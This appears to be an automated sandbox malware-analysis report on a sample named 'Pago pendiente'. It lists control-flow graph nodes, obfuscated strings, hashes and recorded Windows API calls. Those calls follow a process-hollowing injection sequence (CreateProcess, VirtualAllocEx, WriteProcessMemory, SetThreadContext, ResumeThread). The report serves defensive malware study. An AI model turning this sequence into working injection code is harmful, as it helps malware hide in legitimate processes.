382 7721e66-7721e68 344->382 383 7721e45 344->383 363 7721f00 345->363 364 7721eec-7721efe 345->364 346->316 356 7721ee1 349->356 350->356 351->334 353->346 369 7722086 354->369 355->314 368 772207a-7722081 355->368 356->345 371 7721fd2-7721fdb 358->371 372 7721ff3 358->372 373 77220cb-77220d8 359->373 360->373 361->344 362->344 374 7721f03-7721f07 363->374 364->374 368->369 369->316 376 7721fe2-7721fef 371->376 377 7721fdd-7721fe0 371->377 378 
7721ff6-7721ff8 372->378 398 77220f0-77220fd 373->398 399 77220da-77220e0 373->399 379 7721f28 374->379 380 7721f09-7721f12 374->380 385 7721ff1 376->385 377->385 386 7722016 378->386 387 7721ffa-7722000 378->387 391 7721f2b-7721f4c 379->391 389 7721f14-7721f17 380->389 390 7721f19-7721f1c 380->390 382->310 383->305 385->378 392 7722018-772201a 386->392 396 7722002-7722004 387->396 397 7722006-7722012 387->397 400 7721f26 389->400 390->400 391->314 410 7721f52-7721f5b 391->410 402 7722034-7722046 392->402 403 772201c-7722022 392->403 404 7722145 393->404 394->314 405 7722156-7722160 394->405 406 7722014 396->406 397->406 398->314 409 7722103-772210f 398->409 407 77220e2 399->407 408 77220e4-77220e6 399->408 400->391 402->316 411 7722026-7722032 403->411 412 7722024 403->412 404->316 405->404 406->392 407->398 408->398 409->316 410->316 411->402 412->402
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fjq$ fjq$ fjq$Teeq$Teeq$XXeq$XXeq$$eq$$eq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-1742843821
                                                          • Opcode ID: e88e097eabd6c6e91f5eab59ae435fcc168c1a34d04f3bca6d2fd2de5085e6fc
                                                          • Instruction ID: cb51925d416e06e7cc5f092a88bd071dfc227d31f2be94279345355390b7877c
                                                          • Opcode Fuzzy Hash: e88e097eabd6c6e91f5eab59ae435fcc168c1a34d04f3bca6d2fd2de5085e6fc
                                                          • Instruction Fuzzy Hash: 24B1B0B0E1412DDFCB15CF94C854AAEBBB2FB85341FA58455E422AB2D5CB309C42DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 417 7720448-7720483 575 7720488 call 7720b80 417->575 576 7720488 call 7720b71 417->576 418 772048e-77204fe call 77202f4 429 7720503-7720506 418->429 430 7720508 429->430 431 772050f-7720519 429->431 430->431 432 7720630-7720692 430->432 433 77207f0 430->433 434 7720731-772073b 430->434 435 7720697-77206aa 430->435 436 77207d4-77207e1 430->436 437 772053b-772057e 430->437 438 772071c-7720729 430->438 439 772059d-77205a3 430->439 440 77206c2-77206c6 430->440 441 7720580-772058a 430->441 442 7720787-772078b 430->442 443 7720605-772060f 430->443 444 77205ea-77205f1 430->444 445 77207e9-77207ee 430->445 446 772074e 430->446 447 772051f-772052d 431->447 448 77206ac 431->448 432->429 465 77207fd-7720800 433->465 461 7720751-7720776 434->461 462 772073d-7720749 434->462 449 77206b1 435->449 436->445 437->429 438->434 452 77205a5-77205a7 439->452 453 77205a9-77205b5 439->453 454 77206e7 440->454 455 77206c8-77206d1 440->455 450 7720596-772059b 441->450 451 772058c 441->451 457 77207ac 442->457 458 772078d-7720796 442->458 459 7720611 443->459 460 7720618-772061f 443->460 444->448 456 77205f7-7720600 444->456 464 772077b-772077e 445->464 446->461 447->448 463 7720533-7720539 447->463 448->449 467 77206b6-77206b9 449->467 466 7720591 450->466 451->466 469 77205b7-77205e5 452->469 453->469 472 77206ea-77206ec 454->472 470 77206d3-77206d6 455->470 471 77206d8-77206db 455->471 456->429 468 77207af-77207b1 457->468 474 7720798-772079b 458->474 475 772079d-77207a0 458->475 476 7720613 459->476 460->448 477 7720625-772062e 460->477 461->464 462->467 463->429 464->442 473 7720780 464->473 483 7720812-7720816 465->483 484 7720802 465->484 466->429 467->440 486 77206bb 467->486 499 77207b3-77207bd 468->499 500 77207cd-77207d2 468->500 469->429 488 77206e5 470->488 471->488 490 7720708-772070f 472->490 491 77206ee-77206f8 472->491 473->433 473->436 473->442 473->445 473->483 492 7720ad2-7720ad9 473->492 493 
7720903-7720905 473->493 494 7720854-7720858 473->494 495 77209f5-7720a85 473->495 496 772090a-7720983 473->496 497 7720a8a-7720aa1 473->497 498 77209a8-77209b6 473->498 485 77207aa 474->485 475->485 476->429 477->476 501 7720818-7720821 483->501 502 7720839 483->502 484->483 484->492 484->493 484->494 484->495 484->496 484->497 484->498 485->468 486->433 486->434 486->436 486->438 486->440 486->442 486->445 486->446 486->496 488->472 490->461 506 7720711-772071a 490->506 491->461 505 77206fa-7720701 491->505 493->465 503 772085a-7720863 494->503 504 772087b 494->504 495->465 566 7720985-772098b 496->566 567 772099b-77209a3 496->567 542 7720aa3-7720aa9 497->542 543 7720ab9 497->543 529 77209b8-77209be 498->529 530 77209ce-77209e0 call 772b23c 498->530 511 77207f3-77207f8 499->511 512 77207bf-77207c6 499->512 500->436 508 77207cb 500->508 514 7720823-7720826 501->514 515 7720828-7720835 501->515 523 772083c-7720846 502->523 517 7720865-7720868 503->517 518 772086a-7720877 503->518 516 772087e-77208e8 504->516 521 7720706 505->521 506->521 508->464 511->465 512->508 525 7720837 514->525 515->525 564 7720900 516->564 565 77208ea-77208f0 516->565 526 7720879 517->526 518->526 521->467 535 7720851 523->535 525->523 526->516 538 77209c2-77209c4 529->538 539 77209c0 529->539 553 77209e8-77209f0 530->553 535->494 538->530 539->530 547 7720aab 542->547 548 7720aad-7720aaf 542->548 577 7720abb call 772e338 543->577 578 7720abb call 772e329 543->578 547->543 548->543 552 7720ac1 557 7720ac8-7720acd 552->557 553->465 557->465 564->493 571 77208f2 565->571 572 77208f4-77208f6 565->572 569 772098f-7720991 566->569 570 772098d 566->570 567->465 569->567 570->567 571->564 572->564 575->418 576->418 577->552 578->552
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$Teeq$Teeq$Teeq$Teeq$Teeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-2274862041
                                                          • Opcode ID: 018490542d896f0c0b69dce8a29add28ef08d2955e2abc56f369e7785a08de8e
                                                          • Instruction ID: 06a60dce1922a90df7a45b2aa3cc8a7deff4158b18c96c8c9c726475f35da81c
                                                          • Opcode Fuzzy Hash: 018490542d896f0c0b69dce8a29add28ef08d2955e2abc56f369e7785a08de8e
                                                          • Instruction Fuzzy Hash: B2F1B0B4F10219DFDB109B69C819B7E7AB2FB88744F208425F452AB3C5DB749C42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fjq$ fjq$Teeq$XXeq$XXeq$XXeq$XXeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-1505009098
                                                          • Opcode ID: 546aae99e6dd62fabe51a86409283d34b479199695adc92707a0ff03984a9de0
                                                          • Instruction ID: f383dd3609e987a2546ac003acf6e635cb20c733d720b564188e277609775421
                                                          • Opcode Fuzzy Hash: 546aae99e6dd62fabe51a86409283d34b479199695adc92707a0ff03984a9de0
                                                          • Instruction Fuzzy Hash: C7A1A3B0E1422DDFDB15CF94C844AADB7B2FF41381F958856E522AB295C7309C43EB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fjq$ fjq$Teeq$XXeq$XXeq$XXeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-2613762053
                                                          • Opcode ID: 20899d387e41b619bb8005a3aa9b6e1a033c19eb36028ce06c982788ba4971ab
                                                          • Instruction ID: 47fc70e422b3f90cd84fe8adcddce005671a626bfa3825b30eb7a5394ea1f8ab
                                                          • Opcode Fuzzy Hash: 20899d387e41b619bb8005a3aa9b6e1a033c19eb36028ce06c982788ba4971ab
                                                          • Instruction Fuzzy Hash: 2BA1A2B0E1423DDFDB25CF94C844AADB7B2FB41381F958856E522AB295C7309C43EB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fjq$ fjq$Teeq$XXeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-2400119280
                                                          • Opcode ID: 9a21a05ec8ffe0c57887a15257a664d084a4df2856eee96050c780c7b20fcda9
                                                          • Instruction ID: 8af784f12a819a07775abc19271ed373460ab6fc1b320f2dc0f3c088be6ef46b
                                                          • Opcode Fuzzy Hash: 9a21a05ec8ffe0c57887a15257a664d084a4df2856eee96050c780c7b20fcda9
                                                          • Instruction Fuzzy Hash: 33818FB0E1423DDFDB25CF94C844AADB7B2FB45381F958856E521AB291C7309C43EB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$Teeq$Teeq$Teeq$$eq$$eq
                                                          • API String ID: 0-3195343334
                                                          • Opcode ID: 889188a0da897a03b69781f797f6599981b23ff9197fa3c728d793ade2a73dc2
                                                          • Instruction ID: 128a36bf8b17975f2d0d439a60a61e810f846d4683d0b97ce0f3e8b42f68aaae
                                                          • Opcode Fuzzy Hash: 889188a0da897a03b69781f797f6599981b23ff9197fa3c728d793ade2a73dc2
                                                          • Instruction Fuzzy Hash: 1DE1C2B4B10214DFDB109B69D819B7E7AB2FB88745F208425F456EB3C4DB709C42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LReq$LReq$LReq$LReq$$eq$$eq$$eq
                                                          • API String ID: 0-1693550593
                                                          • Opcode ID: d20788935c767f3011801145168c543ac5a6dfc8df7008f2bc1a38e07275569c
                                                          • Instruction ID: 4cf9f976ac22802f060b17bb8ae3ab726bd7fedf9c4db2914158d86ced11ebcd
                                                          • Opcode Fuzzy Hash: d20788935c767f3011801145168c543ac5a6dfc8df7008f2bc1a38e07275569c
                                                          • Instruction Fuzzy Hash: C7418CB4A0025DCBCB00CFA9C458A6FBBB1FF44300F64D899D4265B3A1D731AA46CB66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8iq$8iq$8iq$8iq
                                                          • API String ID: 0-3635788720
                                                          • Opcode ID: 76cc788d21696d3f61cd655dc003de4af56499357ddb10400bc2adfed22d45f9
                                                          • Instruction ID: 4058c9646465c394676b7b03c76b5797104bb438a4811fceff14e7a8f07c8076
                                                          • Opcode Fuzzy Hash: 76cc788d21696d3f61cd655dc003de4af56499357ddb10400bc2adfed22d45f9
                                                          • Instruction Fuzzy Hash: 5C213DF0618235CFD7288B69D8443FAB7A5FB42358F14853BE0B5C61A1C638D982D230
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq
                                                          • API String ID: 0-2246304398
                                                          • Opcode ID: c157d970edb4a76381dec7f57cc88177c0aff303a853ca8cf27c1c8508df7f74
                                                          • Instruction ID: b72ea5c63b5a6775c64f17d21dfba303129026b93d51e54cbef80f163189e5eb
                                                          • Opcode Fuzzy Hash: c157d970edb4a76381dec7f57cc88177c0aff303a853ca8cf27c1c8508df7f74
                                                          • Instruction Fuzzy Hash: 9281C1B4B10218DFDB109B65D8197BE7BB2FB85781F208429F456AB3D4CB709C42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq
                                                          • API String ID: 0-2246304398
                                                          • Opcode ID: fa0861353e611e75dc8c1268660520b183bdeca07bec75b8c53d79f1d3dc3282
                                                          • Instruction ID: 39d4b568d52a65c645fdd92eefb378ae1a0dec74837d04499f8205d5427976b9
                                                          • Opcode Fuzzy Hash: fa0861353e611e75dc8c1268660520b183bdeca07bec75b8c53d79f1d3dc3282
                                                          • Instruction Fuzzy Hash: D461B3B4B10218DFDB119B65D8197BE7BB2FB88741F208429F556AB3C4CE309D42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8iq$8iq
                                                          • API String ID: 0-767271662
                                                          • Opcode ID: 3c1866bc60bd08d353236227fa9edd665fab5e3e62d3683bb24d435423654a1d
                                                          • Instruction ID: 7e475a332bae227190033a6a4ad0c3f5e1b5c97273a8998cb23a795cd298f445
                                                          • Opcode Fuzzy Hash: 3c1866bc60bd08d353236227fa9edd665fab5e3e62d3683bb24d435423654a1d
                                                          • Instruction Fuzzy Hash: E63104B0F1422ADFCB04DB6CC446A7E77F1EB85381F128469D921AB285DA308D429791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 3H5$3H5
                                                          • API String ID: 0-2752242361
                                                          • Opcode ID: 70923b15bfd4bf03323ef637ae789bd74de7565c758ffb636c9386ef4efdf964
                                                          • Instruction ID: 014c8fe1c807bf9fe32b6413bf656ad90e842ced42cf4554e5737576288fd9bd
                                                          • Opcode Fuzzy Hash: 70923b15bfd4bf03323ef637ae789bd74de7565c758ffb636c9386ef4efdf964
                                                          • Instruction Fuzzy Hash: F72105B0D1121AEFCB44CFAAC540AAEFBF1BF89200F14C5AA9518E7214E7309A41DB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57E16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A57E16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031AB37E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1EE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1EE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 031A5F39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 031A5F39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 058B45E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A579E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A579E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A5783E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57AC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031AD9B6,?,?,?,?,?), ref: 031ADA77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A5783E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57AC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031AD9B6,?,?,?,?,?), ref: 031ADA77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57906
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AB3F9,00000800,00000000,00000000), ref: 031AB5EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AB3F9,00000800,00000000,00000000), ref: 031AB5EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57906
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A42D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
